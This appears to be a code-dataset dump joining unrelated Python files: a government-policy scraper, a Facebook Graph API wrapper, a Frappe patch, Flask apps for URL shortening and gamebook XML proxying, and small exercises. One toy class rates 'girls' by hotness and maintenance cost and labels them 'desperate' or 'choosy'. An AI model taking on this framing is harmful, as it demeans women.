#获取总页数,拼接其他页面地址,然后分页处理。\n page_count_strs = response.css('div.page a')\n for page_count_str in page_count_strs:\n s = page_count_str.css('a::text').extract_first().replace(' ','')\n if s.find('最后一页') != -1:\n tmps = page_count_str.css('a::attr(\"href\")').extract_first()\n page_count = int(tmps[tmps.find('index_')+6:tmps.find('.html')])\n root_url = response.url[:response.url.find('index')]\n middle_url = 'index_'\n last_url_tag = '.html'\n next_page_urls = get_next_pages(page_count-1, root_url, middle_url, last_url_tag, 2)\n for next_page_url in next_page_urls:\n yield response.follow(next_page_url, self.parse_list, meta={'a_websource': '广东'})\n except Exception as e:\n print(str(e))\n\n def parse_list(self, response):\n \"\"\"\n 找到网页中文章列表,并回调文章解析函数。\n :param response:\n :return:\n \"\"\"\n a_websource = response.meta[\"a_websource\"]\n try:\n a_urls_css = 'div.viewList li span'\n links = get_urls(a_urls_css, response)\n put_dates = response.css('div.viewList li span.time::text').extract()\n for link in links:\n yield response.follow(link.url, self.parse_artical,meta={'a_websource': a_websource, 'pub_date':put_dates[links.index(link)]})\n except Exception as e:\n print(str(e))\n\n def parse_artical(self,response):\n \"\"\"\n 处理文章内容,先获取表头政策描述信息,再解析下方正文信息。\n :param response:\n :return:\n \"\"\"\n furl = failurl()\n doc = zhengCe()\n doc['a_timestamp'] = datetime.now()\n\n try:\n doc[\"a_websource\"] = response.meta[\"a_websource\"]\n doc[\"a_url\"] = response.url\n doc[\"a_pub_time\"] = response.meta[\"pub_date\"]\n if len(get_text(response.css('div.classify div.row div.col').extract())[0]) == 0:\n res = get_js_webpage(response.url,delay=1)\n else:\n res = response\n metas = get_text(res.css('div.classify div.row div.col').extract())[0]\n if len(metas) != 0:\n meta_strs = res.css('div.classify div.row div.col')\n doc[\"a_pub_meta\"] = metas\n for meta in meta_strs:\n s = meta.css('label::text').extract_first().replace('\\xa0','')\n if meta.css('span::text').extract_first() != None:\n value = meta.css('span::text').extract_first().replace('\\xa0', '')\n if s.find('索引号') != -1:\n doc[\"a_index\"] = value\n elif s.find('分类') != -1:\n doc[\"a_class\"] = value\n elif s.find('发布机构') != -1:\n doc[\"a_pub_org\"] = value\n elif s.find('成文日期') != -1:\n doc[\"a_edit_time\"] = value\n elif s.find('文号') != -1:\n doc[\"a_pub_num\"] = value\n elif s.find('名称') != -1:\n doc[\"a_title\"] = value\n doc[\"a_source\"], doc[\"a_content\"] = get_text(res.css('div.article-content p').extract())\n if len(doc[\"a_content\"]) == 0:\n doc[\"a_source\"], doc[\"a_content\"] = get_text(res.css('div.article-content td').extract())\n if len(doc[\"a_content\"]) == 0:\n doc[\"a_content\"] = '未获取到内容'\n elif len(get_text(res.css('div.zw-info').extract_first())[0]) !=0 :\n title = res.css('h3.zw-title::text').extract_first()\n metas = get_text(res.css('div.zw-info').extract_first())[0]\n meta_strs = res.css('div.zw-info span')\n for meta in meta_strs:\n s = meta.css('span::text').extract_first().replace(' ','')\n if s.find('来源') != -1:\n doc[\"a_pub_org\"] = s[s.find('来源')+3:]\n elif s.find('时间') != -1:\n doc[\"a_pub_time\"] = s[s.find('时间')+3:]\n doc[\"a_pub_meta\"] = metas\n doc[\"a_title\"] = title\n doc[\"a_source\"], doc[\"a_content\"] = get_text(res.css('div.zw p').extract())\n if len(doc[\"a_content\"]) == 0:\n doc[\"a_content\"] = '未获取到内容'\n yield doc\n except Exception as e:\n furl['type'] = str(response.status)\n furl['url'] = response.url\n furl[\"error\"] = str(e)\n yield furl","sub_path":"spdiers/govenment/zhengce/spiders/44_guangd_zc.py","file_name":"44_guangd_zc.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"613942094","text":"# Dictionaries. Each key has a value. dictionary = {'key', 'value'}\nclassmates = {'Tony': 'is cool but smells', 'Emma': 'sits behind me', 'Lucy': 'asks too many questions'}\n\n# How to manipulate dictionaries\n'''\nprint(classmates)\nprint(classmates['Lucy'])\n'''\n\n# Manipulate keys and values in a for loop\nfor k, v in classmates.items():\n print(k + \" \" + v)\n","sub_path":"Python3/TNB/oldFiles/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"37003465","text":"import requests\n\nfrom exceptions import *\n\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\nclass GraphAPI(object):\n \n def __init__(self, oauth_token=None):\n self.oauth_token = oauth_token\n \n def get(self, path='', **options):\n \"\"\"\n Get an item from the Graph API.\n \n Arguments:\n path -- A string describing the path to the item.\n **options -- Graph API parameters such as 'limit', 'offset' or 'since' (see http://developers.facebook.com/docs/reference/api/).\n \"\"\"\n \n response = self._query('GET', path, options)\n \n if response is False:\n raise self.Error('Could not get \"%s\".' % path)\n \n return response\n \n def post(self, path='', **data):\n \"\"\"\n Post an item to the Graph API.\n \n Arguments:\n path -- A string describing the path to the item.\n **options -- Graph API publishing parameters (see http://developers.facebook.com/docs/reference/api/#publishing).\n \"\"\"\n \n response = self._query('POST', path, data)\n \n if response is False:\n raise self.Error('Could not post to \"%s\"' % path)\n \n return response\n \n def delete(self, path):\n \"\"\"\n Delete an item in the Graph API.\n \n Arguments:\n path -- A string describing the path to the item.\n \"\"\"\n \n response = self._query('DELETE', path)\n \n if response is False:\n raise self.Error('Could not delete \"%s\"' % path)\n \n return response\n \n def search(self, term, type, **options):\n \"\"\"\n Search for an item in the Graph API.\n \n Arguments:\n term -- A string describing the search term.\n type -- A string describing the type of items to search for *.\n **options -- Additional Graph API parameters, such as 'center' and 'distance' (see http://developers.facebook.com/docs/reference/api/).\n \n Supported types are 'post', 'user', 'page', 'event', 'group', 'place' and 'checkin'.\n \"\"\"\n \n SUPPORTED_TYPES = ['post', 'user', 'page', 'event', 'group', 'place', 'checkin']\n if type not in SUPPORTED_TYPES:\n raise ValueError('Unsupported type \"%s\". Supported types are %s' % (type, ', '.join(SUPPORTED_TYPES)))\n \n options = dict({\n 'q': term,\n 'type': type,\n }, **options)\n \n response = self._query('GET', 'search', options)\n \n return response\n \n \n def _query(self, method, path, data={}):\n \"\"\"\n Low-level access to Facebook's Graph API.\n \n Arguments:\n method -- A string describing the HTTP method.\n path -- A string describing the path.\n data -- A dictionary of HTTP GET parameters (for GET requests) or POST data (for POST requests).\n \"\"\"\n \n # Convert option lists to comma-separated values; Facebook chokes on array-like constructs\n # in the query string (like [...]?ids=['johannes.gorset', 'atle.mo']).\n for key, value in data.items():\n if type(value) is list and all([type(item) in (str, unicode) for item in value]):\n data[key] = ','.join(value)\n \n if self.oauth_token:\n data.update({'access_token': self.oauth_token })\n response = requests.request(method, 'https://graph.facebook.com/%s' % path, data=data)\n\n return self._parse(response.content)\n \n def _parse(self, data):\n \"\"\"\n Parse the response from Facebook's Graph API.\n \n Arguments:\n data -- A string describing the Graph API's response.\n \"\"\"\n \n try:\n data = json.loads(data)\n except ValueError as e:\n return data\n \n # Facebook's Graph API sometimes responds with 'true' or 'false'. Facebook offers no documentation\n # as to the prerequisites for this type of response, though it seems that it responds with 'true'\n # when objects are successfully deleted and 'false' upon attempting to delete or access an item that\n # one does not have access to.\n # \n # For example, the API would respond with 'false' upon attempting to query a feed item without having\n # the 'read_stream' extended permission. If you were to query the entire feed, however, it would respond\n # with an empty list instead.\n # \n # Genius.\n #\n # We'll handle this discrepancy as gracefully as we can by implementing logic to deal with this behavior\n # in the high-level access functions (get, post, delete etc.).\n if type(data) is bool:\n return data\n \n if type(data) is dict:\n \n if 'error' in data:\n raise self.Error(data['error']['message'])\n \n # If the response contains a 'data' key, strip everything else (it serves no purpose)\n if 'data' in data:\n data = data['data']\n \n return data\n\n class Error(FacepyError):\n pass\n","sub_path":"facepy/graph_api.py","file_name":"graph_api.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"268039520","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe.custom.doctype.custom_field.custom_field import create_custom_fields\nfrom verp.regional.india.setup import add_permissions, add_print_formats\n\ndef execute():\n\tcompany = frappe.get_all('Company', filters = {'country': 'India'})\n\tif not company:\n\t\treturn\n\n\tfrappe.reload_doc(\"custom\", \"doctype\", \"custom_field\")\n\tfrappe.reload_doc(\"regional\", \"doctype\", \"e_invoice_settings\")\n\tcustom_fields = {\n\t\t'Sales Invoice': [\n\t\t\tdict(fieldname='irn', label='IRN', fieldtype='Data', read_only=1, insert_after='customer', no_copy=1, print_hide=1,\n\t\t\t\tdepends_on='eval:in_list([\"Registered Regular\", \"SEZ\", \"Overseas\", \"Deemed Export\"], doc.gst_category) && doc.irn_cancelled === 0'),\n\t\t\t\n\t\t\tdict(fieldname='ack_no', label='Ack. No.', fieldtype='Data', read_only=1, hidden=1, insert_after='irn', no_copy=1, print_hide=1),\n\t\t\n\t\t\tdict(fieldname='ack_date', label='Ack. Date', fieldtype='Data', read_only=1, hidden=1, insert_after='ack_no', no_copy=1, print_hide=1),\n\n\t\t\tdict(fieldname='irn_cancelled', label='IRN Cancelled', fieldtype='Check', no_copy=1, print_hide=1,\n\t\t\t\tdepends_on='eval:(doc.irn_cancelled === 1)', read_only=1, allow_on_submit=1, insert_after='customer'),\n\n\t\t\tdict(fieldname='eway_bill_cancelled', label='E-Way Bill Cancelled', fieldtype='Check', no_copy=1, print_hide=1,\n\t\t\t\tdepends_on='eval:(doc.eway_bill_cancelled === 1)', read_only=1, allow_on_submit=1, insert_after='customer'),\n\n\t\t\tdict(fieldname='signed_einvoice', fieldtype='Code', options='JSON', hidden=1, no_copy=1, print_hide=1, read_only=1),\n\n\t\t\tdict(fieldname='signed_qr_code', fieldtype='Code', options='JSON', hidden=1, no_copy=1, print_hide=1, read_only=1),\n\n\t\t\tdict(fieldname='qrcode_image', label='QRCode', fieldtype='Attach Image', hidden=1, no_copy=1, print_hide=1, read_only=1)\n\t\t]\n\t}\n\tcreate_custom_fields(custom_fields, update=True)\n\tadd_permissions()\n\tadd_print_formats()\n\n\teinvoice_cond = 'in_list([\"Registered Regular\", \"SEZ\", \"Overseas\", \"Deemed Export\"], doc.gst_category)'\n\tt = {\n\t\t'mode_of_transport': [{'default': None}],\n\t\t'distance': [{'mandatory_depends_on': f'eval:{einvoice_cond} && doc.transporter'}],\n\t\t'gst_vehicle_type': [{'mandatory_depends_on': f'eval:{einvoice_cond} && doc.mode_of_transport == \"Road\"'}],\n\t\t'lr_date': [{'mandatory_depends_on': f'eval:{einvoice_cond} && in_list([\"Air\", \"Ship\", \"Rail\"], doc.mode_of_transport)'}],\n\t\t'lr_no': [{'mandatory_depends_on': f'eval:{einvoice_cond} && in_list([\"Air\", \"Ship\", \"Rail\"], doc.mode_of_transport)'}],\n\t\t'vehicle_no': [{'mandatory_depends_on': f'eval:{einvoice_cond} && doc.mode_of_transport == \"Road\"'}],\n\t\t'ewaybill': [\n\t\t\t{'read_only_depends_on': 'eval:doc.irn && doc.ewaybill'},\n\t\t\t{'depends_on': 'eval:((doc.docstatus === 1 || doc.ewaybill) && doc.eway_bill_cancelled === 0)'}\n\t\t]\n\t}\n\n\tfor field, conditions in t.items():\n\t\tfor c in conditions:\n\t\t\t[(prop, value)] = c.items()\n\t\t\tfrappe.db.set_value('Custom Field', { 'fieldname': field }, prop, value)\n","sub_path":"verp/patches/v12_0/setup_einvoice_fields.py","file_name":"setup_einvoice_fields.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"529174056","text":"import math\nclass commgirl:\n\tdef __init__(self,name,hotn,smrtn,mntcst,choice,bo,typ):\n\t\tself.name=name\n\t\tself.hotn=hotn#girl's hotness: a no. from 0-9\n\t\tself.smrtn=smrtn#girl's smartness: a no. from 0-9\n\t\tself.mntcst=mntcst#girl's maintainence cost: a no. from 0-999\n\t\tself.choice=choice#girl's choce: a no. from a set of {'a','r','i'} , 'a' for most attractive, 'r' for most richest and 'i' for most intelligent\n\t\tself.bo=bo\n\t\tself.typ=typ#type: a letter from set {'c','n','d'} c for choosy, n for normal and d for desperate\n\tdef happinesscalculator(self):\n\t\tif self.typ=='c':\n\t\t\tself.hpns=4#math.log(self.bo.mnyspt-self.mntcst)+(self.bo.totvalue+self.bo.lgiftv)# a girl's happiness as an attribute\n\t\telif self.typ=='n':\n\t\t\tself.hpns=4#(self.bo.mnyspt-self.mntcst)/100+self.bo.totvalue\n\t\telse :\n\t\t\tself.hpns=4#math.exp(self.bo.mnyspt-self.mntcst)\n\t\t\t\n","sub_path":"commgirl.py","file_name":"commgirl.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"370284716","text":"from flask import Flask, render_template, request, redirect, _app_ctx_stack, jsonify\nfrom sqlite3 import dbapi2 as sqlite3\nimport short_url\nimport os\nimport math\n\nALPHABET = \"abcdfghjklmnpqrstvwxyz0123456789BCDFGHJKLMNPQRSTVWXYZ\"\nBASE = len(ALPHABET)\nMAXLEN = 6\n\napp = Flask(__name__)\n\napp.config.update(dict(\n DATABASE=os.path.join(app.root_path, 'urls.db'),\n DEBUG=True,\n SECRET_KEY='development key'\n))\n\n\n\ndef encode_id(n):\n\n pad = MAXLEN - 1\n n = int(n + pow(BASE, pad))\n\n s = []\n t = int(math.log(n, BASE))\n while True:\n bcp = int(pow(BASE, t))\n a = int(n / bcp) % BASE\n s.append(ALPHABET[a:a+1])\n n = n - (a * bcp)\n t -= 1\n if t < 0: break\n\n return \"\".join(reversed(s))\n\ndef decode_id(n):\n\n n = \"\".join(reversed(n))\n s = 0\n l = len(n) - 1\n t = 0\n while True:\n bcpow = int(pow(BASE, l - t))\n s = s + ALPHABET.index(n[t:t+1]) * bcpow\n t += 1\n if t > l: break\n\n pad = MAXLEN - 1\n s = int(s - pow(BASE, pad))\n\n return int(s)\n\ndef get_db():\n \"\"\"Opens a new database connection if there is none yet for the\n current application context.\n \"\"\"\n top = _app_ctx_stack.top\n if not hasattr(top, 'sqlite_db'):\n top.sqlite_db = sqlite3.connect(app.config['DATABASE'])\n top.sqlite_db.row_factory = sqlite3.Row\n return top.sqlite_db\n\n\n@app.teardown_appcontext\ndef close_database(exception):\n \"\"\"Closes the database again at the end of the request.\"\"\"\n top = _app_ctx_stack.top\n if hasattr(top, 'sqlite_db'):\n top.sqlite_db.close()\n\n\ndef init_db():\n \"\"\"Initializes the database.\"\"\"\n db = get_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\"\"\"\n@app.cli.command('initdb')\ndef initdb_command():\n Creates the database tables.\n init_db()\n print('Initialized the database.')\n\"\"\"\n\ndef query_db(query, args=(), one=False):\n \"\"\"Queries the database and returns a list of dictionaries.\"\"\"\n cur = get_db().execute(query, args)\n rv = cur.fetchall()\n return (rv[0] if rv else None) if one else rv\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/short_url')\ndef short_url():\n print('yo')\n url = request.args.get('url_string', 'http://placeholder.it', type=str)\n print(url)\n db = get_db()\n print(\"test\")\n db.execute('insert into urls (url_string) values (?)', (url,))\n print(\"?\")\n db.commit()\n ids = query_db('select max(url_id) from urls', one=True)\n last_id = 0\n for id in ids:\n print(id)\n last_id = id\n print(encode_id(last_id))\n url_hash = encode_id(last_id)\n print(url_hash)\n print(jsonify(hash=url_hash))\n return jsonify(hash=url_hash)\n\n@app.route('/')\ndef redirect_to_hash(url_hash):\n url_id = decode_id(url_hash)\n print(url_id)\n url = query_db('select * from urls where url_id = ?', (url_id,), one=True)\n return redirect(url['url_string'])\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=80)\n","sub_path":"shortener.py","file_name":"shortener.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"410653398","text":"from flask import Flask\nfrom flask import request\nfrom flask import Response\nfrom flask import render_template\nfrom flask import make_response\nfrom whitenoise import WhiteNoise\nimport requests\n\nimport jinja2\nimport os\nimport datetime\n\nimport cgi\nimport urllib.request, urllib.parse, urllib.error\nimport http.client\nimport re\nimport urllib.request, urllib.error, urllib.parse\nimport string\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n\tloader=jinja2.FileSystemLoader(os.path.dirname(__file__)))\n\napp = Flask(__name__)\napp.wsgi_app = WhiteNoise(app.wsgi_app, root='./static')\n\n@app.route('/')\ndef IndexPage():\n\tif request.method == 'GET':\n\t\ttemplate = JINJA_ENVIRONMENT.get_template('templates/index.html')\n\t\treturn render_template(template)\n\n@app.route('/triggercache')\ndef TriggerCachePage():\n\tif request.method == 'GET':\n\t\ttemplate = JINJA_ENVIRONMENT.get_template('templates/triggercache.html')\n\t\treturn render_template(template)\n\n@app.route('/app.appcache')\ndef OfflineApplicationCacheManifest():\n\tdef getTitleFilePaths(title_res):\n\t\tdata_query = '\\n'\n\t\tif request.args.get('app','') == 'true':\n\t\t\tdata_query = '&type=jsonp&callback=fback\\n'\n\n\t\ttitle_files = []\n\t\ttemp_files = title_res.readlines()\n\n\t\t# Add the XML data file, cached either as xml for the web or jsonp for apps\n\t\ttitle_files.append(temp_files[0].replace('\\n', '') + data_query) \n\n\t\ttitle_images = temp_files[1] # Get the images URL\n\t\turl = title_images\n\t\tpattern = '(.*\\.png)'\n\t\tresponse = requests.get(url).text\n\n\t\tfor image in re.findall(pattern, response):\n\t\t\ttitle_files.append(url.replace('\\n', '') + image + '\\n')\n\t\tlast_file_index = len(title_files) - 1\n\t\ttitle_files[last_file_index] = title_files[last_file_index].rstrip('\\n') # Get rid of the last newline\n\n\t\treturn title_files\n\n\tif request.method == 'GET':\n\t\t# Check the cookie value to see if the user has agreed to the terms, \n\t\t# and if so then add the projecaon.org resource files to the cache manifest\n\t\tapp_files = []\n\t\tappmod_files = []\n\t\tui_files = []\n\t\ttitle1_files = []\n\t\ttitle2_files = []\n\t\ttitle3_files = []\n\t\ttitle4_files = []\n\t\ttitle5_files = []\n\t\ttitle6_files = []\n\t\ttitle7_files = []\n\t\ttitle8_files = []\n\t\tagreed = 0\n\t\tif 'agreed' in request.cookies:\n\t\t\tagreed = request.cookies['agreed']\n\t\twith open('./app/resources/app.res') as app_res:\n\t\t\tapp_files = app_res.readlines()\n\t\twith open('./app/resources/appmod.res') as appmod_res:\n\t\t\tappmod_files = appmod_res.readlines()\n\t\t\tappmod_files = [file.replace('\\n', '') + '?0.2.205\\n' for file in appmod_files]\n\t\t\tappmod_files[-1] = appmod_files[-1].replace('\\n', '') # Remove the last line's line break\n\t\tif agreed == '1':\n\t\t\twith open('./app/resources/ui.res') as ui_res:\n\t\t\t\tui_files = ui_res.readlines()\n\t\t\twith open('./app/resources/title1.res') as title1_res:\n\t\t\t\ttitle1_files = getTitleFilePaths(title1_res)\n\t\t\twith open('./app/resources/title2.res') as title2_res:\n\t\t\t\ttitle2_files = getTitleFilePaths(title2_res)\n\t\t\twith open('./app/resources/title3.res') as title3_res:\n\t\t\t\ttitle3_files = getTitleFilePaths(title3_res)\n\t\t\twith open('./app/resources/title4.res') as title4_res:\n\t\t\t\ttitle4_files = getTitleFilePaths(title4_res)\n\t\t\twith open('./app/resources/title5.res') as title5_res:\n\t\t\t\ttitle5_files = getTitleFilePaths(title5_res)\n\n\t\ttemplate_values = {\n\t\t\t'datetimestamp': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), \n\t\t\t'app_files': app_files, \n\t\t\t'appmod_files': appmod_files, \n\t\t\t'ui_files': ui_files, \n\t\t\t'title1_files': title1_files, \n\t\t\t'title2_files': title2_files, \n\t\t\t'title3_files': title3_files, \n\t\t\t'title4_files': title4_files, \n\t\t\t'title5_files': title5_files, \n\t\t\t'title6_files': title6_files, \n\t\t\t'title7_files': title7_files, \n\t\t\t'title8_files': title8_files \n\t\t}\n\t\ttemplate = JINJA_ENVIRONMENT.get_template('templates/app.appcache')\n\n\t\tresp = make_response(render_template(template, **template_values))\n\n\t\tresp.headers['Content-Type'] = 'text/cache-manifest'\n\n\t\t# Do not cache the cache manifest file.\n\t\tresp.headers['cache-control'] = 'no-cache, no-store, must-revalidate'\n\t\tresp.headers['Pragma'] = 'no-cache'\n\t\tresp.headers['Expires'] = '0'\n\n\t\treturn resp\n\n@app.route('/totalfiles')\ndef GetTotalFiles():\n\tdef getTitleFileCount(title_res):\n\t\ttitle_file_count = 0\n\t\ttemp_files = title_res.readlines()\n\t\ttitle_file_count += 1 # Add the XML data file\n\t\ttitle_images = temp_files[1] # Get the images URL\n\t\turl = title_images\n\t\tpattern = '(.*\\.png)'\n\t\tresponse = requests.get(url).text\n\t\tfor image in re.findall(pattern, response):\n\t\t\ttitle_file_count += 1\n\t\treturn title_file_count\n\n\tif request.method == 'GET':\n\t\tapp_file_count = 0\n\t\tappmod_file_count = 0\n\t\tui_file_count = 0\n\t\ttitle1_file_count = 0\n\t\ttitle2_file_count = 0\n\t\ttitle3_file_count = 0\n\t\ttitle4_file_count = 0\n\t\ttitle5_file_count = 0\n\t\ttitle6_file_count = 0\n\t\ttitle7_file_count = 0\n\t\ttitle8_file_count = 0\n\t\tagreed = 0\n\t\tif 'agreed' in request.cookies:\n\t\t\tagreed = request.cookies['agreed']\n\t\twith open('./app/resources/app.res') as app_res:\n\t\t\tapp_file_count = len(app_res.readlines())\n\t\twith open('./app/resources/appmod.res') as appmod_res:\n\t\t\tappmod_file_count = len(appmod_res.readlines())\n\t\tif agreed == '1':\n\t\t\twith open('./app/resources/ui.res') as ui_res:\n\t\t\t\tui_file_count = len(ui_res.readlines())\n\t\t\twith open('./app/resources/title1.res') as title1_res:\n\t\t\t\ttitle1_file_count = getTitleFileCount(title1_res)\n\t\t\twith open('./app/resources/title2.res') as title2_res:\n\t\t\t\ttitle2_file_count = getTitleFileCount(title2_res)\n\t\t\twith open('./app/resources/title3.res') as title3_res:\n\t\t\t\ttitle3_file_count = getTitleFileCount(title3_res)\n\t\t\twith open('./app/resources/title4.res') as title4_res:\n\t\t\t\ttitle4_file_count = getTitleFileCount(title4_res)\n\t\t\twith open('./app/resources/title5.res') as title5_res:\n\t\t\t\ttitle5_file_count = getTitleFileCount(title5_res)\n\n\t\ttemplate_values = {\n\t\t\t'total_files': (\n\t\t\t\tui_file_count + app_file_count + appmod_file_count + \n\t\t\t\ttitle1_file_count + \n\t\t\t\ttitle2_file_count + \n\t\t\t\ttitle3_file_count + \n\t\t\t\ttitle4_file_count + \n\t\t\t\ttitle5_file_count + \n\t\t\t\ttitle6_file_count + \n\t\t\t\ttitle7_file_count + \n\t\t\t\ttitle8_file_count - 1\n\t\t\t)\n\t\t}\n\t\ttemplate = JINJA_ENVIRONMENT.get_template('templates/totalfiles')\n\n\t\treturn render_template(template, **template_values)\n\n@app.route('/data', methods=['GET', 'POST'])\ndef ProxyController():\n\tdef doProxy(p, is_post):\n\n\t\t# Only download the XML content from projectaon.org if the user has agreed to the terms.\n\t\tagreed = 0\n\t\tif 'agreed' in request.cookies:\n\t\t\tagreed = request.cookies['agreed']\n\t\twith open('./app/resources/app.res') as app_res:\n\t\t\tapp_files = app_res.readlines()\n\t\tif agreed == '1':\n\n\t\t\ttitle = ''\n\n\t\t\tif p.get('title','') == '':\n\t\t\t\treturn 'resource location not found'\n\t\t\telse:\n\t\t\t\ttitle = p['title']\n\n\t\t\t\tdataType = 'xml'\n\t\t\t\tif p.get('type','') == 'jsonp':\n\t\t\t\t\tdataType = 'jsonp'\n\t\t\t\tcallbackFn = ''\n\t\t\t\tif p.get('callback','') != '':\n\t\t\t\t\tcallbackFn = p['callback']\n\n\t\t\t\turl = ''\n\t\t\t\tif title == '1':\n\t\t\t\t\turl = 'https://www.projectaon.org/en/xml/01fftd.xml' \n\t\t\t\tif title == '2':\n\t\t\t\t\turl = 'https://www.projectaon.org/en/xml/02fotw.xml' \n\t\t\t\tif title == '3':\n\t\t\t\t\turl = 'https://www.projectaon.org/en/xml/03tcok.xml' \n\t\t\t\tif title == '4':\n\t\t\t\t\turl = 'https://www.projectaon.org/en/xml/04tcod.xml' \n\t\t\t\tif title == '5':\n\t\t\t\t\turl = 'https://www.projectaon.org/en/xml/05sots.xml' \n\n\t\t\t\tvalid_content = '';\n\t\t\t\tif url != '':\n\t\t\t\t\tif is_post:\n\t\t\t\t\t\tdata = urllib.parse.urlencode(p)\n\t\t\t\t\t\treq = urllib.request.Request(url, data)\n\t\t\t\t\t\tresult = requests.get(url)\n\t\t\t\t\t\tvalid_content = result.text\n\t\t\t\t\telse:\n\t\t\t\t\t\tresult = requests.get(url)\n\t\t\t\t\t\tvalid_content = result.text\n\n\t\t\t\t\t# remove general directives\n\t\t\t\t\tvalid_content = valid_content.replace('%general.links;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('%xhtml.links;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('%general.inclusions;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('&link.project.website;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('&inclusion.joe.dever.bio.lw;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('&inclusion.gary.chalk.bio.lw;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('&link.staff.contact;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('&inclusion.project.aon.license;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('&inclusion.joe.dever.endowment;', '')\n\n\t\t\t\t\t# replace non-valid special characters with html special characters\n\t\t\t\t\tvalid_content = re.sub('', '&hellip;', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', '&hellip;', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', '&mdash;', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', '&ndash;', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', '&rsquo;', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', '
', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', '-', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', '&amp;', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', ' ', valid_content);\n\n\t\t\t\t\t# replace html special characters\n\t\t\t\t\tvalid_content = re.sub('', r'&\\1;', valid_content);\n\n\t\t\t\tif dataType == 'jsonp':\n\t\t\t\t\t# get rid of new lines\n\t\t\t\t\tvalid_content = re.sub(r'\\r', '', valid_content);\n\t\t\t\t\tvalid_content = re.sub(r'\\n', '', valid_content);\n\n\t\t\t\t\tresp = Response(callbackFn + '(\\'' + valid_content + '\\');')\n\t\t\t\t\tresp.headers['Content-Type'] = 'text/javascript'\n\t\t\t\t\treturn resp\n\t\t\t\telse:\n\t\t\t\t\tresp = Response(valid_content)\n\t\t\t\t\tresp.headers['Content-Type'] = 'text/xml'\n\t\t\t\t\treturn resp\n\n\t# handles get requests\n\tif request.method == 'GET':\n\t\treturn doProxy(request.args, False)\n\n\t# handles post requests\n\tif request.method == 'POST':\n\t\treturn doProxy(request.form, True)\n\nif __name__ == \"__main__\":\n\tapp.run(host='0.0.0.0', port='8000')\n","sub_path":"app/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":9813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"80739846","text":"##Faça um programa que carregue um vetor de dez elementos que contenha o nome de pessoas e outro que contenha o peso, encontre qual a pessoa mais gorda e mais magra e \n##apresente o nome o peso das mesmas. Use dois vetores, um para peso e outro para nome. Não use nenhuma função pronta da linguagem Python.\n\nvet_nome = []\nvet_peso = []\nfor i in range(5):\n vet_nome.append(str(input('Digite o nome: ')))\n vet_peso.append(float(input('Digite o peso: ')))\n if i == 0:\n peso_maior = vet_peso[i]\n peso_menor = vet_peso[i]\n nome_gordo = vet_nome[i]\n nome_magro = vet_nome[i]\n if vet_peso[i] > peso_maior:\n peso_maior = vet_peso[i]\n nome_gordo = vet_nome[i]\n if vet_peso[i] < peso_menor:\n peso_menor = vet_peso[i]\n nome_magro = vet_nome[i]\nprint(nome_gordo, 'possui o maior peso, com', peso_maior, 'quilos.')\nprint(nome_magro, 'possui o maior peso, com', peso_menor, 'quilos.')\n","sub_path":"Vetor - Ex3.py","file_name":"Vetor - Ex3.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"316118556","text":"import os\nimport sys\n\npath = os.path.abspath(os.path.join(os.path.dirname(__file__), '../utils/'))\nif not path in sys.path:\n sys.path.insert(1, path)\ndel path\n\nimport utils\n\n\nclass Node:\n def __init__(self):\n self.ip_address = '0.0.0.0'\n self.connections = {}\n self.routingPath = {}\n\n def addConnection(self, destination, distance):\n utils.Utils.isStr(destination)\n utils.Utils.isFloat(distance)\n self.connections[destination] = distance\n\n def addPath(self, destination, path):\n utils.Utils.isStr(destination)\n self.routingPath[destination] = path\n\n\nclass Path:\n def __init__(self, aPath, aValue):\n utils.Utils.isList(aPath)\n utils.Utils.isFloat(aValue)\n self.path = aPath\n self.value = aValue\n","sub_path":"src/node/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"6792883","text":"#Configuration File\n#IMPORT ALL VARIABLES FROM .env\n\nimport os\nfrom dotenv import load_dotenv, find_dotenv\n\nload_dotenv(find_dotenv())\n\nDEBUG_VAR = os.environ.get(\"DEBUG_VAR\")\ndbName = os.environ.get(\"dbName\")\ndbUrl = os.environ.get(\"dbUrl\")\n\nif DEBUG_VAR == 'True':\n DEBUG = 